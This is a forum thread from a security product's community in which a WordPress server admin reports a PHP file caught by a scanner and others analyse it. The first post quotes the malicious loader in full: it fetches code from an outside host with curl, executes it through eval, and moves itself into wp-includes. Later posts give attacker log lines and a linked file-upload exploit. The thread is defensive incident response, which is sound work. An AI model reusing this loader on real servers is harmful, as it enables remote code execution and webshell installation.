FTL 1 Posted October 22 Share Posted October 22 (edited) Real time scanner on my Ubuntu 22.04 server thats used just to host wordpress sites found and deleted this bad boy Content of the file are as follows: <?php error_reporting(0); $HomePath = $_SERVER['DOCUMENT_ROOT'] . "/wp-includes/Text/Diff/"; define('CUSTOM_FILE_PATH', $HomePath); $file_path = __FILE__; $file_name = basename($file_path); $ch = curl_init('hxxp://ndot.us/za');curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$result = curl_exec($ch);eval('?>'.$result); $customFilePath = CUSTOM_FILE_PATH . $file_name; rename(__FILE__,$customFilePath); ?> Ive checked all sites /wp-includes/Text/Diff directories and there are no new modified files/folders in any of them. What would be my next steps? Thanks in advance Edited October 22 by FTL Quote Link to comment Share on other sites More sharing options...
itman 1,630 Posted October 22 Share Posted October 22 (edited) Access ndot.us/za in a browser on Windows and see what happens. https://www.virustotal.com/gui/url/df38f83fac1af3dcc1a8c5380d99083d6ffa43ec6470c3bd433ed12541d1dc59/detection Interestingly, Eset didn't block the code from being displayed. Edited October 22 by itman Quote Link to comment Share on other sites More sharing options...
FTL 1 Posted October 22 Author Share Posted October 22 Chromium based browsers just show the code on the page in plain text Firefox shows the page formatted I cant see anything happening when i hit the page I have blocked outbound access to ndot.us now but just wondering if and what anything has already happened? Quote Link to comment Share on other sites More sharing options...
itman 1,630 Posted October 22 Share Posted October 22 (edited) 2 hours ago, FTL said: Firefox shows the page formatted My FF 118.0.2 showed code in plain text format. Note the modification author even stated who he is. Since this person has multiple scripts posted at Github, I assume this is where it originated from. Edited October 22 by itman Quote Link to comment Share on other sites More sharing options...
itman 1,630 Posted October 22 Share Posted October 22 Eset now finally blocking the domain; Also of interest is this domain won't scan at Sucuri. It displays the web site doesn't contain any data - go figure. Quote Link to comment Share on other sites More sharing options...
itman 1,630 Posted October 22 Share Posted October 22 Believe I found the original code at Github: https://gist.github.com/kosinix/52c13666c5632dae559910dbfe180df2 Quote Link to comment Share on other sites More sharing options...
Gregecslo 8 Posted October 23 Share Posted October 23 Yes you did I also found it. URLSCAN.IO shows multiple scans for this domain with different Webshells hosted on it. @FTL We also got this detection, but it`s OK because at least for us, webserver returned 404 or 500 when POST request was made (we do not host wordpress at all). So basically this is automated script, that tries to exploit some wordpress vulnerability and if successful, curl downloads webshell. Example: 95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG And yes, detection occurred on: file:///tmp/phpMjc32fg which is normal, because PHP processed this POST request. So in my opinion nothing happened with your server, but check where that post request was made and make sure WP and plugins are up to date. itman 1 Quote Link to comment Share on other sites More sharing options...
itman 1,630 Posted October 23 Share Posted October 23 8 hours ago, Gregecslo said: Yes you did I also found it. The Github link I posted was to the original WP plug-in. My above posted screen shots show that this plug-in was modified by someone named Mr. 7Mind. This same individual also has numerous other scripts posted at Github including reverse shell backdoors. So it appears this hack was very much "an off-the-shelf" one. The question is where was the modified WP plug-in acquired from? Quote Link to comment Share on other sites More sharing options...
Gregecslo 8 Posted October 23 Share Posted October 23 This I don`t know. For me, detection came from this: 95.214.27.5 - - [23/Oct/2023:05:39:30 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 500 1713 "-" mjdomain.com "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" APACHELOG And it seems that exploited vuln is: https://support.alertlogic.com/hc/en-us/articles/115005740363-Metasploit-WordPress-Ajax-Load-More-Arbitrary-File-Upload Again, I have NO wordpress site installed (but ESET did detect it anyways in PHP TEMP which IS NORMAL), server returns 404 or 500.... That`s why I said that OP should check POST requests on server... Quote Link to comment Share on other sites More sharing options...
FTL 1 Posted October 26 Author Share Posted October 26 So 4 times had this file created and RTS deleted now All on different sites - but they are all up to date for both Wordpress and all plugins Server is up to date too Same pesky IP aswell so thats blocked now but not the answer i know Site 1 95.214.27.5 - - [21/Oct/2023:18:32:22 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" Site 2 95.214.27.5 - - [22/Oct/2023:16:25:54 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" Site 3 95.214.27.5 - - [24/Oct/2023:22:26:34 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" Site 4 95.214.27.5 - - [26/Oct/2023:08:18:28 +0100] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 11 "-" "Mozilla/6.4 (Windows NT 11.1) Gecko/2010102 Firefox/99.0" How is this PITA managing to continually drop malicious PHP files onto the tmp folder on server? In Depth scan of the server is clean Quote Link to comment Share on other sites More sharing options...
Administrators Marcos 4,935 Posted October 26 Administrators Share Posted October 26 Do you have Apache and PHP updated as well? You may want to take security measures for Apache and PHP, e.g. https://httpd.apache.org/docs/2.4/misc/security_tips.html and https://www.getastra.com/blog/php-security/php-security-guide/ for instance. Quote Link to comment Share on other sites More sharing options...
FTL 1 Posted October 26 Author Share Posted October 26 Hi Marcos I use Nginx rather than Apache, both are on the latest stable versions i believe nginx version: nginx/1.24.0 PHP 8.2.11 (cli) (built: Oct 6 2023 09:47:18) (NTS) Quote Link to comment Share on other sites More sharing options...
Administrators Marcos 4,935 Posted October 26 Administrators Share Posted October 26 I would then contact a security company that audits websites. Quote Link to comment Share on other sites More sharing options...
Gregecslo 8 Posted October 27 Share Posted October 27 (edited) Quote And yes, detection occurred on: file:///tmp/phpMjc32fg which is normal, because PHP processed this POST request. Again, I have NO wordpress site installed (but ESET did detect it anyways in PHP TEMP which IS NORMAL), server returns 404 or 500.... If somebody does POST request with malicious file inside POST request PHP will process it (execution is done in PHP TMP folder) and that is where detection comes from. This also happens to me on server where nothing is installed but apache + php... Deleted ESET, SAME post request came, no files were dropped (but file was naturally in PHP). Problem would be if you find XXXX.php file which was dropped in webserver folder... Edited October 27 by Gregecslo FTL 1 Quote Link to comment Share on other sites More sharing options...
Gregecslo 8 Posted October 27 Share Posted October 27 Something like this: https://octobercms.com/forum/post/being-attacked-please-help?page=1#post-37387 FTL 1 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.